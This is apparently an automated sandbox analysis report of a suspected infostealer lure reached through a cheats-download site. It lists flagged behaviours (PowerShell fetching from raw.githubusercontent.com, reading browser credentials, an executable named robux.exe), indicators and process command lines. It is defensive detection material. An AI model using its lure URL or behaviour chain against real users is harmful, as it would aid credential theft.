Analysis
max time kernel: 360s
max time network: 370s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 13-09-2024 20:37
Static task: static1
URLScan task: urlscan1
Malware Config
Signatures
Blocklisted process makes network request 2 IoCs
flow  pid   Process
441   1616  powershell.exe
443   1616  powershell.exe
pid   Process
1616  powershell.exe
Downloads MZ/PE file
Executes dropped EXE 10 IoCs
pid   Process
5412  OperaGXSetup.exe
5896  setup.exe
2628  setup.exe
5312  setup.exe
2336  setup.exe
3524  setup.exe
2524  Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe
5564  assistant_installer.exe
5452  assistant_installer.exe
5864  robux.exe
Loads dropped DLL 5 IoCs
pid   Process
5896  setup.exe
2628  setup.exe
5312  setup.exe
2336  setup.exe
3524  setup.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description              ioc     Process
File opened (read-only)  \??\F:  setup.exe
File opened (read-only)  \??\D:  setup.exe
File opened (read-only)  \??\F:  setup.exe
File opened (read-only)  \??\D:  setup.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow  ioc
437   raw.githubusercontent.com
438   raw.githubusercontent.com
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc                                                         Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  setup.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  setup.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  assistant_installer.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  melter.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  OperaGXSetup.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  setup.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  setup.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  setup.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  assistant_installer.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  robux.exe
Delays execution with timeout.exe 2 IoCs
pid   Process
5924  timeout.exe
3472  timeout.exe
Enumerates system info in registry 2 TTPs 3 IoCs
description        ioc                                                                    Process
Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                     msedge.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   msedge.exe
Modifies registry class 1 IoCs
description  ioc                                                                                                                                                                                             Process
Key created  \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-656926755-4116854191-210765258-1000\{69D8332B-2C8D-40DE-A6E4-CDE51689F69B}  msedge.exe
NTFS ADS 2 IoCs
description                   ioc                                                                  Process
File opened for modification  C:\Users\Admin\Downloads\Unconfirmed 590365.crdownload:SmartScreen  msedge.exe
File opened for modification  C:\Users\Admin\Downloads\Unconfirmed 905431.crdownload:SmartScreen  msedge.exe
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid   Process
3064  msedge.exe
3064  msedge.exe
2784  msedge.exe
2784  msedge.exe
3752  identity_helper.exe
3752  identity_helper.exe
5548  msedge.exe
5548  msedge.exe
5148  msedge.exe
5148  msedge.exe
5148  msedge.exe
5148  msedge.exe
1612  msedge.exe
1612  msedge.exe
5304  msedge.exe
5304  msedge.exe
1616  powershell.exe
1616  powershell.exe
1616  powershell.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 41 IoCs
pid Process 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description              pid   Process
Token: SeDebugPrivilege  1616  powershell.exe
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe -
Suspicious use of SendNotifyMessage 40 IoCs
pid Process 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid   Process
5896  setup.exe
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2784 wrote to memory of 1512 2784 msedge.exe 83 PID 2784 wrote to memory of 1512 2784 msedge.exe 83 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 
msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 3064 2784 msedge.exe 85 PID 2784 wrote to memory of 3064 2784 msedge.exe 85 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cheatsfinder.org/e5140e61⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2784
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe59d46f8,0x7fffe59d4708,0x7fffe59d47182⤵PID:1512
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:22⤵PID:2324
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3064
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:82⤵PID:2100
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:12⤵PID:3476
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:12⤵PID:1564
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:12⤵PID:1488
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:82⤵PID:1676
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3752
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:12⤵PID:2808
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:12⤵PID:3480
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:12⤵PID:2964
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:12⤵PID:3996
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:12⤵PID:4336
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:12⤵PID:4008
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:12⤵PID:3112
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:12⤵PID:3776
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:12⤵PID:648
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:12⤵PID:5284
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:12⤵PID:5412
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6788 /prefetch:12⤵PID:5488
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6972 /prefetch:12⤵PID:5596
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6720 /prefetch:12⤵PID:5676
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1824 /prefetch:12⤵PID:5164
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6532 /prefetch:82⤵PID:5240
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1364 /prefetch:12⤵PID:3776
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5968 /prefetch:82⤵PID:4500
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6984 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5548
C:\Users\Admin\Downloads\OperaGXSetup.exe"C:\Users\Admin\Downloads\OperaGXSetup.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5412
C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe --server-tracking-blob=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3⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:5896
C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=113.0.5230.75 --initial-client-data=0x330,0x334,0x338,0x30c,0x33c,0x74091864,0x74091870,0x7409187c4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2628
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5312
C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe"C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=1 --general-interests=1 --general-location=1 --personalized-content=1 --personalized-ads=1 --vought_browser=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera GX" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --server-tracking-data=server_tracking_data --initial-pid=5896 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_20240913203818" --session-guid=7ce49914-d5ac-40e5-849d-f6f67760cd60 --server-tracking-blob=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 --desktopshortcut=1 --wait-for-package --initial-proc-handle=98090000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:2336
C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=113.0.5230.75 --initial-client-data=0x320,0x324,0x328,0x2fc,0x32c,0x71941864,0x71941870,0x7194187c5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3524
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2524
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5564 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=73.0.3856.382 --initial-client-data=0x288,0x28c,0x290,0x264,0x294,0x1d4f48,0x1d4f58,0x1d4f645⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5452
-
-
-
-
-
